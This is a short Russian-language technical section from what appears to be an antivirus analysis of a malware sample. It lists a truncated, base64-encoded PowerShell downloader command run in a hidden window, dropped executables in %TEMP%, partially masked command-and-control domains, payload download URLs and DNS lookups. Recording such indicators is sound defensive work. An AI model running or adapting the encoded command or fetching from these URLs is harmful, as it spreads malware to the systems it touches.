Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADQAOABhAGwAMgBqAD0AJwBHAGQAawB3AHAAYgBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGMAYABVAHIASQBgAFQAWQBwAHIAYABvAFQAbwBDAE8ATAAiACAAPQAgAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1416
- %TEMP%\1138058.cvr
- %TEMP%\jgws.exe
- 'oc###iptigo.com':80
- 'oc###iptigo.com':443
- 'me####lucoesti.com':80
- 'me####lucoesti.com':443
- 'ra###ways.com':80
- 'm.####zyy120.com':80
- http://oc###iptigo.com/undrag/FRg446071/
- http://me####lucoesti.com/R9KDq0O8w/HBh300/
- http://ra###ways.com/wp-content/XwZGZ94507/
- http://m.####zyy120.com/kfal/hKIpdkhdqU/
- 'oc###iptigo.com':443
- 'me####lucoesti.com':443
- DNS ASK gh.###pyy120.com
- DNS ASK oc###iptigo.com
- DNS ASK me####lucoesti.com
- DNS ASK ra###ways.com
- DNS ASK m.####zyy120.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADQAOABhAGwAMgBqAD0AJwBHAGQAawB3AHAAYgBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGMAYABVAHIASQBgAFQAWQBwAHIAYABvAFQAbwBDAE8ATAAiACAAPQAgAC... (со скрытым окном)